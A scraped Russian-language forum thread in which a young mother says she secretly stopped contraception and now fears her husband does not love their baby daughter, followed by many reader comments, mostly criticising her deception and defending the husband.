Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-07 21:22:31 от Гость
что написать парню на отношения 11 месяцев приятное?? ... Подробнее
Последний комментарий
История : Яркая ты бабочка души моей...
час назад2016-12-08 04:59:52 от Silvana
23007Очень красиво Вы излагаете! Я сначала думала, что это о доченьке. А потом поняла- это про Чувственность. Все комментарии67617
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о детях
Комедия
вчера в 12:41:152016-12-07 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Истории о детях - Мой муж не любит нашего ребенка
Истории о детях : Мой муж не любит нашего ребенка     День добрый, дорогие гости и участники сайта! Меня зовут Яна. Мне 20, я замужем два года. Мужу моему 22. Он у меня замечательный, мы очень друг друга любим и я никогда не думала, что у меня с ним возникнут какие то проблемы. Но вот сейчас возникла.
Я лет с 13 мечтала о семье, о детках. Всегда хотела большую, дружную семью. Еще до свадьбы я с Лешей (мужем моим), пыталась обсуждать с ним, как назовем детей, сколько он хочет. Он как-то энтузиазма не проявлял, но я тогда не придала этому значения.
Потом мы поженились и я как-то была уверена, что сразу заведем детей. Но он оказался категорически против, заявил, что у него учеба и работа сейчас, а потом нужно на ноги стать. Я понимаю, что это важно, но в нашем случае это было не актуально так как у меня очень хорошие родители и они всегда и во всем готовы нам помогать. Я не понимаю, зачем ждать годы, ведь нет никакой гарантии, что это "становление на ноги" не затянется лет так на десять. И что потом? В тридцать рожать? Я так не хотела.
Но Леша никогда помощи от моих родителей принимать не хотел, хотя не чужие люди и ничего стыдного я в этом не вижу. Год я потерпела, а потом просто перестала принимать таблетки.
Забеременела. Помню, летела с этой новостью, как на крыльях. Была уверена, что Леша в худшем случае поворчит немного и поймет, какое же это счастье. Никогда не думала, что из-за РОДНОГО РЕБЕНКА можно устроить такой скандал, какой устроил мне он. У меня до сих на него до конца не прошла обида за то, что он испортил такой счастливый день. Много он тогда наговорил, не буду все повторять. Говорил, что детей нужно планировать. А мне кажется, что это от Бога зависит, нельзя к такому относится как к какому то проекту. Сказал, что не ожидал от меня такого и что он разочарован. Больно было очень это слышать.
Но через какое-то время мы помирились. Он был очень заботливый, все мои капризы исполнял, по врачам со мной ездил. Правда оставался камень преткновения из-за того, что он начал хвататься за любые подработки. Бывало заснет за столом над переводом, а через пару часов на учебу. Я ругалась, но его эта гордыня не позволяла ему принимать помощь от моих родителей. Разве стыдно, когда помогают родные? Я никогда не могла этого понять, но уступила ему в этом вопросе.
Сейчас нашей доченьке уже полгодика. И я с ужасом понимаю, что Леша ее не любит. Иногда обниму ее и реву, потому что понимаю, что папа наш с учебы не спешит и дома ему быть как будто не в радость. Нет, он за ней ухаживает. Первые два месяца вообще только он по ночам к ней вставал, и покормит, и памперс сменит, и погуляет. Его равнодушие проявляется в том, что он лишний раз ей не улыбнется, не поцелует. На руках я ее ношу, так это я ее "балую и буду до трех лет таскать". Ругается, чтобы я с ней не сюсюкала. Плачет, бывает, так он не сразу к ней пойдет. Так все автоматически делает, будто это не родная доченька, а чужой ребенок. Что с ним произошло, я не понимаю. И как теперь быть? Надеятся, что со временем это к нему придет? Так полгода прошло уже... Страшно, что это станет концом наших отношений, ведь я все еще очень его люблю.
64900
Другие Истории о детях
(64)
Гость
Гость

05 июня 20:52:31
2016-06-05 20:52:31

Я не думаю что ваш муж не любит своего ребёнка, , просто он в растерянности, не знает и не умеет ещё проявлять эти чувства, они придут со временем сами, как муж он может уже состоялся, как отец нет, поэтому просил вас повременить, действительно вы совсем молоды, могли бы ещё лет пять пожить для себя, а потом уже детей... и муж был бы готов психологически, все таки я согласен с ним что вы поступили не правильно...

Ответить
Поддерживаю Да7 / Нет0
солнышко я ясное!
21300 солнышко я ясное!
солнышко я ясное! offline
Репутация : 475
Комментариев 10 2
05 июня 20:57:05
2016-06-05 20:57:05

У меня такое впечатление сложилось, что вы просто с жиру беситесь! Радуйтесь, и поверьте ничего ужасного ваш муж не сделал.

Ответить
Поддерживаю Да3 / Нет1
Злая Сибирячка
20475 Злая Сибирячка
Злая Сибирячка online
Репутация : 94371
Комментариев 699 1
05 июня 21:20:01
2016-06-05 21:20:01

Ваш муж прав!!! Прежде чем заводить детей нужно встать на ноги, стыдно мужику клянчить деньги у родителей!!!

Ох уж эти ваши хотелки, вы маленькая, капризная девочка, сама еще ребенок! Никакой ответственности за свои поступки! Почему ваши родители должны платить за вашего ребенка, за ваши прихоти??! Я понимаю, что это их внук, но мне кажется, что они вас выростили, должны пожить и для себя.

Если бы вы знали с каким трудом зарабатываются деньги, точно повременили бы с ребенком!

Ответить
Поддерживаю Да8 / Нет0
Bert
20913 Bert
Bert offline
Репутация : 124710
Комментариев 1181 1
05 июня 21:23:27
2016-06-05 21:23:27

Автор, может я конечно не прав, но ребёнка должны хотеть двое. Бывают ситуации, когда получается как говориться не жданно, не гадано. Но вы сами решили, что вам пора не выслушав мнение вашего мужа. Он настоящий мужчина в плане того, что пытаеться обеспечить семью сам не рассчитывая на помощь ваших родителей. Вы пишите, что он замечательный во всех отношениях, и это тоже не мало важно. Может он дествительно был не готов к рождению ребёнка, не потому что не хотел, а потому что понимал что эта большая ответственность. Каждый мужчине по разному приходит чувство отцовства. Я согласен с Эльфом, он конечно любит ребёнка, но ещё не может осознать, что он отец. Дайте ему не много времени и вы сами заметите, что с каждым днём он будет становиться всё ближе и ближе к ребёнку. Ребёнок будет расти , становиться очень интересным, ваш муж будет души нечаять вашем общем ребёнке. Ещё может ваш муж очень устаёт на работе, вы же сами пишите что он берёт разные подработки. Всё у вас наладиться. Даже не сомневайтесь в том, что ваш муж не любит ребёнка.

Ответить
Поддерживаю Да4 / Нет0
Еваника
18243 Еваника
Еваника offline
Репутация : 168914
Комментариев 1685 4
05 июня 21:32:45
2016-06-05 21:32:45

Скорее всего у него голова забита вопросами о том, как вас прокормить, одеть-обуть и пр. Это для Вас ребёнок - центр Вселенной, а муж сейчас больше настроен на внешний мир: работу, учебу, подработку. Ведь Вы не дали ему возможность подготовиться к рождению ребёнка, а просто сразу в несколько раз увеличили ему уровень отвественности. Ну и мужская любовь отличается от женской как ни крути. Меня вон папа очень любит, но с тактильными всякими отношениями типа обнять, поцеловать у нас была проблема в детстве, а потом я сама начала лезть обниматься, и он как-то стал более явно проявлять любовь. :) Теперь всегда обнимаемся при встрече-прощании, хоть я уже и большая. :)

Ответить
Поддерживаю Да2 / Нет0
А в голове: "на лабутенах я..."
Оксана
Оксана

05 июня 21:43:04
2016-06-05 21:43:04
Я думаю, что ему просто стоит больше отдыхать. Его мало эмоциональность наверняка оттого, что он устаёт. А его родители вам помогают? Может от низ он охотнее помощь примет? Он с твоими родителями в плохих отношениях?
Ответить
Поддерживаю Да0 / Нет1
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
05 июня 21:47:36
2016-06-05 21:47:36

А чего вы хотели? Вы обманули мужа, как не крути. Сами решили завести ребенка, перестали пить таблетки и поставили перед фактом, что вы беременны. На что вы рассчитывали? Он сейчас и учится и работает, что бы содержать вас и ребенка. Вы думали о нем ? Нет. А он хотел встать на ноги, потом заводить потомство. Вы решили за него. Так чему ему радоваться? Он не хотел и не готов был к ребенку. Простите хотели вы вы и получили. И такой эгоистический поступок он не скоро забудет.

Ответить
Поддерживаю Да5 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Яна
Яна

05 июня 22:20:46
2016-06-05 22:20:46
Спасибо всем за комментарии. Обидно, что некоторые все же меня осудили, но я могу это понять. Моим родителям не тяжело нам помогать, у них стабильное финансовое положение. Что касается родителей мужа, то их просто нет. Отца он не знает, мама его умерла 9 лет назад. Бабушка, с которой он жил, тоже умерла 4 года назад. К моим родителям он относится хорошо, уважительно. Но бывает ругается, что я мол к маме постоянно бегаю и обо всем рассказываю. А мне кажется, что это наоборот хорошо, когда с родителями доверительные отношения и было бы так хорошо, если бы Леша не упрямился.
Ответить
Поддерживаю Да0 / Нет0
Bert
20913 Bert
Bert offline
Репутация : 124710
Комментариев 1181 1
05 июня 22:34:05
2016-06-05 22:34:05

Яна, Темболее вашего мужа можно понять, он остался без родителей в раннем возрасте. Возможно, когда вы мечтали в 13 лет о семье, он просто мечтал как встать на ноги. Он жил без родителей, а значит ему не всегда всё хватало, как другим детям. Вот он и решил иметь детей тогда, когда встанет крепко на ноги. Чтоб у его ребёнка было всё, что не хватало ему когда то. И ещё в детстве ему не хватало теплоты родителей, поэтому он и сам не знает как её проявлять к ребёнку. Как я уже писал с выше, ему надо время. На счёт родителей ваших, вы пишите им не трудно помочь, Да! Но всё же ваш муж считает, что если вы вышли замуж, то и обеспечивать семью он должен сам. Это отпечаталось у него ещё с детства, решать всё самому. На самом деле радуйтесь, что ваш муж старается не спихнуть на кого то проблемы, а решать самому.

Ответить
Поддерживаю Да3 / Нет0
Xelen
21144 Xelen
Xelen offline
Репутация : 36166
Комментариев 436 1
05 июня 23:15:39
2016-06-05 23:15:39

Читаю вашу историю и понимаю, что хоть вам уже и 20 лет, и уже мама, но вы до сих пор остаетесь маленьким глупым ребенком. Вам вообще радоваться надо, что муж не ушел. Ведь вы ему своим враньем сейчас огромные проблемы создали. Я представляю как это - учиться, подрабатывать и банально не высыпаться из-за криков ребенка по ночам. И дома постоянно стресс для него, с ребенком особо не расслабишься. Ему ведь и для себе пожить хочется, свободой насладиться, уверенность в жизни обрести. Это у вас родители, у него никого. А вы любви ждете? Мужчины не все могут сразу полюбить ребенка, так как мать. Это у них со временем приходит, ведь не он ребенка 9 месяцев носил и не он его при родах выстрадал.

Так что пожинайте плоды своего вранья и эгоизма достойно. Ребенка хотели ВЫ, а не он. И постарайтесь меньше требовать от мужа, он и так упахивается.

Ответить
Поддерживаю Да9 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 251676
Комментариев 2472 8
06 июня 02:04:11
2016-06-06 02:04:11

Я бы на вашем месте радовалась, что муж простил вам обман. И не то, что не копалась бы в том, почему он не " типа не любит " дочку, а была бы благодарна, что не ушел. Потому что Вы рещили за его спиной ВСЕ... Жаль, что Вы не понимаете глубины своего проступка. Нельзя ставить людей перед фактом. У каждого должен быть выбор. А ваш муж порядочный и добрый, раз Вы до сих пор рядом с ним. Пусть малышка Вас радует. Дайте время мужу прийти к радости отцовства, хоть и принудительного, не давите, Вы виноваты.

Ответить
Поддерживаю Да4 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Кира
Кира

06 июня 03:07:05
2016-06-06 03:07:05
да ты сама еще ребенок, а твои родители кстати не обязаны вашу семью обеспечивать! одно дело, когда просто помогают. и совсем дургое, когда вы делаете что хотите, а они еще и вас содержат. я сама хоть и не из той породы людей, которая считает что ребенка обязательно нужно "планировать", но думать надо головой, а не одним местом, и то что он не принимает помощи от родителей, а хочет сам стать на ноги и обеспечивать вашу семью -так это счастье иметь такого мужа! ну родила бы ты не в 30, не в 20 а в 23 например -ничего бы страшного не произошло. после работы он банально устает, а ты ему мозг выносишь. и еще, запомни -женщина должна быть не только маленьким капризным ребенком которого нужно опекать -это лишь одна из ее пяти ролей. а также должна мужу хоть в чем-то пытаться соответствовать, в чем-то стать на один уровень с ним, а у меня сложилось впечатление что ты даже не увлекаешься ничем и кроме семьи у тебя нет интересов по жизни
Ответить
Поддерживаю Да5 / Нет0
Краб
Краб

06 июня 09:03:45
2016-06-06 09:03:45
Вы явно не осознали глубину своего проступка. В отношениях нет ничего страшнее обмана. Особенно в таких важных вопросах. Измена, к слову, страшна именно из-за него. Как уже сказали ранее - вам очень повезло, что вас не бросили из-за подобной подставы. И, как мне кажется, во многом - из-за этого самого ребенка. В принципе все это и может быть причиной такого отношения к дочери - она напоминание о предательстве, которое вы совершили и, возможно, причина по которой он все еще с предательницей. Хотите исправить ситуацию - признайте, что были направы. Сначала для себя, потом извинитесь перед мужем. Может помочь, как не странно.
Ответить
Поддерживаю Да2 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1249285
Комментариев 8866 0
06 июня 11:20:08
2016-06-06 11:20:08

Не делай из мужика мямлю! радуйся, что он сам пытается стать на ноги, а твое "родители помогут" - ужас ужасный. Они не обязаны вам помогать! Вас как пластинку заело о том, что "нет ничего постыдно". Есть! Тем более, для настоящего мужика!

Ответить
Поддерживаю Да7 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
ника777
21248 ника777
Ника777 offline
Репутация : 115836
Комментариев 2147 3
06 июня 11:41:51
2016-06-06 11:41:51

Молодые вы еще... А ты уже в 13 лет думала о семье...{#} Что же на тебя так повлияло, девчонки твоего возраста еще во дворе гуляют... а ты уже с серьезным видом о семье задумалась... Дети - конечно главное в жизни, но ведь еще их надо на что-то содержать? Согласна? Родить не проблема, воспитать и вырастить - проблема??? А чтобы ребенка содержать нужно осознанно к этому подходить, и правильно твой парень говорит - что надо немного на обе ноги встать, чтобы быть готовыми стать родителями, а ты решила все за него, он видимо еще не готов стать отцом, да и какой он отец в 22 года??????????? Ну гулять вам еще и гулять!!!! Пожили бы сначала немного для себя, а там к 23-25 задумались бы о детках... Твои подруги тоже уже замуж повыскакивали??? Ты им еще не завидуешь, что они ходят гулять, уделяют время себе, работают.... а ты уже с лялькой на руках, в голове одни соски, памперсы, болячки, кормежки... И никакого разнообразия...

И не обижайся на него, что он иногда к дочке не подходит, ему свыкнуться с мыслью надо, о том что он теперь глава семьи и он должен вас содержать, он все правильно делает, и это не гордость, а настоящий мужчина, который не берет денег с родителей, который думает, как и где денег заработать, а не на шее сидеть у родных... Радуйся, что он думает о вас, деньги для вас зарабатывает.. А не шляется по клубам с друзьями, и деньги с тебя не трясет...

Ответить
Поддерживаю Да3 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
белая мышка
9141 белая мышка
Белая мышка offline
Репутация : 142710
Комментариев 1511 25
06 июня 12:46:39
2016-06-06 12:46:39

Ваш муж скорее всего не смирился с мыслью что он отец. Он был не готов к этому, а Вы его поставили перед фактом.

Когда ребенок запланированый будущими родителями, то уже получаешь удовольствие от ожидания: сначала двух заветных полосочек, а потом от рождения самого ребенка. А у вас получилось так: Хочешь, не хочешь, нате, получите, роспишитесь. Если у Вас, автор, материнский инстинкт проявился в 13 лет, а в процессе беременности укрепился, то у мужа его как не было, так пока еще и нет.

А то что он берет подработки-молодец, о семье заботится, ответственный. То что помогает с ребенком-уже говорит о том, что он заботливый отец. Вы бы радовались, что он приходя с работы и подработок с ребенком возится и денег с родителей Ваших не трясет.

Да и вообще, я считаю, что у Вас еще послеродовая дипрессия не прошла. Поэтому Вы из ерунды делаете глобальную проблему.

Успокойтесь, наберитесь терпения!

Ответить
Поддерживаю Да2 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Кузя
Кузя

06 июня 13:43:43
2016-06-06 13:43:43
Мда уж... Автор ну и дел вы натворили. Родили себе ребёнка, а теперь на мужа обижаитесь. Ребёнок это не собаку завести, а серьёзное решение и обдуманный поступок ( в большинстве случаев). А вы включили свою хотелку и на мнение мужа вам плевать было. Поэтому не пилите его, а нянькайтесь сами. Он вас обеспечивпет и то хорошо. Да и не плохо бы с шеи родителей слезть, одно дело им внука подбросить поиграть, а другое дело из них деньги тянуть. Как никак уже взрослая, самостоятельная девушка, прекращайте материально от них зависеть, стыдно честное слово. Ну а ребёнка то он своего любит, только не так как вы, а второго запланированного им ребёнка будет любить ещё больше
Ответить
Поддерживаю Да0 / Нет0
Яна
Яна

06 июня 15:44:42
2016-06-06 15:44:42
Я признаю, что ошиблась, когда приняла решение сама. Но клянусь, я никогда и предположить не могла, что муж так отнесется к этому. Я Верила, что он будет рад. Яне считаю дочку обузой, для меня нет большего счастья, чем быть с ней. Когда я встретила Лешу, то поняла, что он именно тот, с кем я хочу семью и много деток.. А теперь все рушится. Он и одному ребенку не рад, а теперь о том чтобы завести второго я и заикнуться боюсь.
Ответить
Поддерживаю Да0 / Нет0
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
06 июня 16:46:43
2016-06-06 16:46:43

Яна, какой 2ой ребенок?! Подождите пару лет, дайте мужу опомнится, встать на ноги. Правильно пишут скажите спасибо, что он не ушел от вас. с мужем вам повезло, цените это. Окружить его уютом, мягко рассказывайте о ребенке, всякие милости, говорите, как доча на папу похожа, прививайте ему любовь к ребенку постепенно. А со 2м ждите пока сам не попросит

Ответить
Поддерживаю Да4 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Штучка
21311 Штучка
Штучка offline
Репутация : 42130
Комментариев 985 0
06 июня 16:55:17
2016-06-06 16:55:17
Автор, свою ошибку нужно признать не только перед самой собой, но и перед мужем тоже. Это важно! Признайте вашу ошибку и наберитесь терпения. То, что происходит - это последствия вашего неправильного поступка. Дайте мужу время для того, чтобы он принял эту ситуацию, да и сами не зацикливайтесь на ней. Что сделано - то сделано. Если будете стоять на своём, то взаимные обиды будут продолжаться бесконечно, а это ни к чему хорошему не приведёт. В остальном я поддерживаю мнение пользователя "Краб".
Ответить
Поддерживаю Да0 / Нет0
Видеть в чудесном чудесное - вот ключ ко всем тайнам мира. Лао - Цзы
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
06 июня 17:52:04
2016-06-06 17:52:04

Дело не в том, что он дочку не любит. Не любил бы, не вставал к ней по ночам и т. д.

Он же работает. А отдыхать ему когда то тоже нужно. Я с младшим в основном сама водилась. Его отец работал на высоте и не мог по ночам к нему вставать. Но понимал что сидеть только я одна не могу, Он предложил вариант что я с вечера сижу, а под утро я его бужу и он с ним сидит. Так мы и сделали. Он вставал в 5 утра и с ним возился. Был такой период когда он у нас день с ночью спутал. Месяца три так было. Вот я до 5 утра с ним сидела. Потом он с ним минут 40 посидит и тот засыпает у него. Как будто до утра его ждал. ))И он еще не много мог подремать. Я просто понимала если он не выспится и не отдохнет то может заснуть на ходу. А упасть с высоты значит разбится или еще что. Серьезные вещи.

Так что не думайте что он дочь не любит. Любит!Устает!Ведь он ваш единственный добытчик. А когда человек устал ему и улыбатся лишний раз не хочется.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Краб
Краб

06 июня 17:56:11
2016-06-06 17:56:11
Яна, то что вы не могли предположить подобной реакции на ваше одностороннее решение завести ребенка говорит лишь о том, что вы вкорне неверно воспринимаете отношения между мужчиной и женщиной. У пары нет своего, есть только общее: время, деньги, имущество, дети. Все решения связнные с этими вещами и со всем, что касается обоих принимаются сообща. Ваш муж отреагировал абсолютно верно, предсказуемо, адекватно и логично в данной ситуации. Еще раз: хотите что-то исправить - поговорите с ним, признайте что поступили эгоистично и несправедливо по отношению к нему, т. к. подобные решения, как и все важные для семьи должны приниматься сообща. Ну и пообещайте более так не поступать (и не поступайте). Вы не представляете насколько это важно для мужчины и насколько исправит положение. Важна и форма подачи: скажите что вам надо серьезно поговорить и т. д. - покажите серьезность своего отношения к проступку.
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

06 июня 17:56:15
2016-06-06 17:56:15
хватит плодиться, ему и так очень непросто одному шкрестись, всех содержать.
Ответить
Поддерживаю Да2 / Нет0
Милая кошка
10885 Милая кошка
Милая кошка offline
Репутация : 586331
Комментариев 7742 13
06 июня 21:09:35
2016-06-06 21:09:35

Т. е. вы считаете нормой нарожать детей в 20 лет, сидеть наше у родителей и не работать?Вам не стыдно?Почему ваши родные должны содержать вас и вашего ребёнка?И какого энтузиазма вы ждёт от мужа, если отняли у него молодостьсо своими хотелками?Не вижу ничего веселого в том, чтобы в 22 вместо того чтобы гулять с друзьями, путешествовать, ходить в кино, развиваться- слушать по ночам оры младенца и памперсы менять.

Ответить
Поддерживаю Да5 / Нет0
Если я тебе не нравлюсь-застрелись! Я не исправлюсь.
Диор
12701 Диор
Диор offline
Репутация : 420775
Комментариев 4864 46
06 июня 21:16:53
2016-06-06 21:16:53

Я так понимаю Вы у родителей любимый и избалованный ребенок. Вас оберегали, обеспечивали. Ваш муж все правильно говорил что рано, теперь не обижайтесь что такое отношение. У него в голове другие проблемы, финансовые. Ребенок это не игрушка. А помимо ребенка, нужно и Вас обеспечивать, одним словом нужно прокормить семью.

Ответить
Поддерживаю Да4 / Нет0
Ну нельзя нравится всем подряд,нужно же кого-то и раздражать для разнообразия)))
Мари
Мари

06 июня 21:46:41
2016-06-06 21:46:41
Да что вы все напали на девчонку? Не нагуляла же она в конце концов, а от мужа родила. Некоторые об этом годами мечтают. \r\nМне кажется, что вам, автор, стоит поговорить с мужем. Так прямо и спросить, почему он холоден с дочерью. Может, страхи какие-то, не знает, как обращаться. У мужчин бывает такое.
Ответить
Поддерживаю Да0 / Нет2
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
06 июня 22:17:57
2016-06-06 22:17:57

Мари, Да конечно нет ничего страшного от того что она от мужа родила!И муж я думаю ее простил и дочку любит!Только и деньги ему тоже надо зарабатывать-семью кормить!Может когда автор выйдет с декрета и поможет ему то станет по легче ему и времени побольше на семью и на дочь!

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

07 июня 00:46:38
2016-06-07 00:46:38
Мой стал папой в 22 тоже практически и ситуация в целом очень похожа, поэтому я вас прнимаю как никто другой! Но разница лишь в том, что этого ни я ни он не планировали. В 22 года для парня очень рано быть папой, редко когда встречаются такие что очень хотят детей в таком возрасте. Сами еще хотят погулять и пожить для себя. Да любит он её, только не умеет себя вести с ребенком, темболее девочкой. Заботится, ухаживает- значит любит. У мужчин это по другому проявляется, чем у женщин, они жаднее чтоли на чувства, не умеют, стыдятся или не хотят проявлять слабость. Я тоже из- за этого постоянно со своим ссорюсь, ребёнку нужен отец, его внимание, любовь, обнимашки, чтобы он чувствовал себя нужным и рос полноценным. Я это понимаю как никто, так как в детстве мне очень нехватало внимания отца, из- за этого в моей взрослой жизни столько боли и проблем, в большинстве надуманных, но попробуй уже обьясни это своему подсознанию. Говорите с мужем об этом, воспитуйте его, только не перегибайте сильно. Доча подрастёт чуть станет ему интересней и может в нем что- то больше проснётся
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

07 июня 00:59:14
2016-06-07 00:59:14
Вы пишите что он рос без родителей, так это тоже влияет на отношение его к вашей дочке. Он сам не получал родительской любви, он не знает как себя вести и к тому же, как уже писалось выше, теперь думает в большей степени как вас обеспечить.
Ответить
Поддерживаю Да0 / Нет0
русалочка
9973 русалочка
Русалочка offline
Репутация : 296888
Комментариев 4963 38
07 июня 17:44:38
2016-06-07 17:44:38

С одной стороны мне непонятна реакция многих здесь: скажи спасибо, что не бросил... ээээ, а он что должен бросить? Вобще-то он муж, и он взял ответственность на себя за эту женщину и их будущих детей. И конечно он понимал, что в перспективе станет отцом, это был всего лишь вопрос времени...

\r\n

С другой стороны, автор, вы не можете понять другое: ваш муж вправе не хотеть иметь детей, или хотеть их в определенном возрасте. Здесь были неправы вы оба, что не проговорили этот момент до свадьбы, вы умолчали об этом факте...

\r\n

r

Но здесь уже что сделано, то сделано. Сейчас ваша задача- это морально помогать мужу, поддерживать его, вдохновлять, говорить, как здорово, когда у ребенка такие молодые родители

Ответить
Поддерживаю Да0 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 251676
Комментариев 2472 8
07 июня 21:10:47
2016-06-07 21:10:47

русалочка , разные вещи. Добровольно взял ответственность, или его не спросили и сделали ответственным. Это две большие разницы. Нельзя человеку навязывать отцовство. Он в праве отрицать то, что он не выбирал.

Ответить
Поддерживаю Да3 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Неалина
5436 Неалина
Неалина online
Репутация : 445751
Комментариев 7642 30
07 июня 21:18:29
2016-06-07 21:18:29

Странная_Такая , Если ему не нужны дети то предохранялся бы сам!И был защищен и не был бы папой сейчас.

А вообще у единиц дети запланированные. В основном ето внезапное явление,

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 251676
Комментариев 2472 8
07 июня 21:24:01
2016-06-07 21:24:01

Неалина, стоп. пара выбрала контрацептивы. Оральные. Их употребляла жена, это было, чтак понимаю. обоюдное решение пары. а теперь мужчина должен стать отцом против воли?! я понимаю еще, если осечка и контрацептив не сработал, а тут сознательный обман. Это некрасиво. Таким поступком супруга показывает полное неуважение к желаниям мужчины. Семью должны планировать оба родителя. А родить дело нехитрое, уж мы то с тобой знаем.

Ответить
Поддерживаю Да1 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Солнечный_Неадекват
14392 Солнечный_Неадекват
Солнечный_Неадекват offline
  • Мисс Находчивость
Репутация : 173848
Комментариев 1594 0
08 июня 07:51:23
2016-06-08 07:51:23

Автор, Вы просто эгоистичная и беспечная особа. Вы считаете вполне нормальным обмануть своего мужа, и за его спиной завести завести ребёнка, как будто это игрушка. Вам было обидно, что он в Вас разочаровался? А ему не должно быть обидно, что Вы наплевали на его слова и просто перестали принимать таблетки? Какое право Вы имеете принимать такое ответственное решение за двоих?

Вам откровенно говоря очень повезло. Немногие парни готовы в 22 года иметь детей. Многие просто уходят от ответственности и дальше гуляют, а девушка остаётся одна с ребёнком. А Ваш муж просто поскандалил, что вполне понятно.

Он работает, учится, заботится о вас с ребёнком. А что делаете Вы? Ждёте помощи от родителей, капризничаете и только ждете от всех исполнения Ваших желаний. Это ВЫ хотели ребёнка, а не он, так что же Вы сейчас удивляетесь?

Из истории я не увидела, что он не любит ребёнка. Это Вами надуманное. К слову, мой отец никогда в жизни практически не проявлял ко мне открытых чувств, но при этом он сделал все, чтобы у меня было образование, крыша над головой и я ни в чем не нуждалась, работая на тяжёлой работе сутками.

В общем, Автор, прекращайте свои придирки. Начните думать не о только о себе, то и о своих близких.

Ответить
Поддерживаю Да3 / Нет0
Кекс, нартортики, сладкий ролл.
Violetta
14552 Violetta
Violetta offline
Репутация : 1249285
Комментариев 8866 0
08 июня 11:27:35
2016-06-08 11:27:35

Солнечный_Неадек ват, у меня тоже такой папа. Никогда не показывает своих чувств, хотя, конечно, я знаю, что он нас любит больше всех на свете.

Ответить
Поддерживаю Да2 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1096311
Комментариев 16148 6
08 июня 12:24:06
2016-06-08 12:24:06

Автор, да вы эгоистичная очень. Почему вы думаете только о себе? Вы не имели права его так обманывать с таблетками! Это не безобидный обман, а такой обман, который повлек за собой последствия, что мужу теперь все жизнь больше работать и меньше спать из-за вас, а потом вы еще жалуетесь, что он не любит ребенка, хотя он все и делал для нее, даже по ночам вставал. И где же он ее не любит? А знаете, как многие другие отцы? Либо вообще убегают, узнав, что беремена, либо даже не подходят к ребенку! А он у вас чуть ли не святой, а вы сейчас тут на него пишите! Да у вас совести просто нет! Вы сама ребенок, который топает ногой: "Хочу то, хочу это!", а ответственность за ваши "хочу" должны нести другие! Вам самой нужно вырасти, прежде, чем ребенка заводить! И меня ужаснуло, когда вы начали писать уже и за второго ребенка! Вам бы лишь нарожать, а кто будет содержать - это уже не столь и важно, да? Я прекрасно понимаю вашего мужа, понимаю, что он хочет сам обеспечивать свою семью и быть мужиком, а вы не понимаете его, а еще и ругаетесь с ним, клюете его! Как он еще не сбежал от вас и вашей ругани не понятно! Бедный парень, которому 22 года всего, ему бы еще гулять, он еще учится, а вы мало того, что ребенка на него повесили, работать приходится больше, учиться, заботиться и ребенком заниматься, так еще и мозги ему выносят! Могли бы хоть помочь ему, хотя бы не клевать ему мозг и заниматься ребенком сама! Вы то что делаете? Вы хотели этого ребенка, а не он, вот и занимайтесь им, а то вы только хотели дитя, а на деле занимается им муж, а обеспечивают родители! Кошмар какой-то! И куда вот вам второго ребенка? Тоже повесить на родителей и мужа? Вы хоть понимаете, что родители то не вечные? Они могут пойти на пенсию, у них изменится финансовое положение, да и вообще возраст же, сегодня они есть, а потом их может не стать, тогда кто будет обеспечивать ваших детей? Нельзя же быть такой беспечной! И вообще, родители были обязаны обеспечивать вас, но не обязаны содержать ваших детей! Это уже ваша обязанность! Как же они справлялись сами? Они сами, а вы не можете! А раз не можете обеспечивать, значит и не нужно было так торопиться с детьми! Вы взрослые, чтоб детей заводить, но как обеспечивать их, так сразу дети, так сразу за родителей прячетесь! Вам нужно взрослеть и срочно! А то завели себе игрушку в виде ребенка, не понимая ответственности! Мужа вашего я поддерживаю, считаю, что он прав и вообще он настоящий мужчина, что он дочку не любит - не вижу, считаю, что он очень даже любит!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Kotozay
13925 Kotozay
Kotozay offline
Репутация : 74730
Комментариев 480 0
08 июня 13:16:30
2016-06-08 13:16:30

Автор, а если бы Ваш муж решил бы сделать какой-то серьезный шаг в жизни, без Вашего участия, более того, зная, что Вы категорически против, как бы Вы отреагировали?

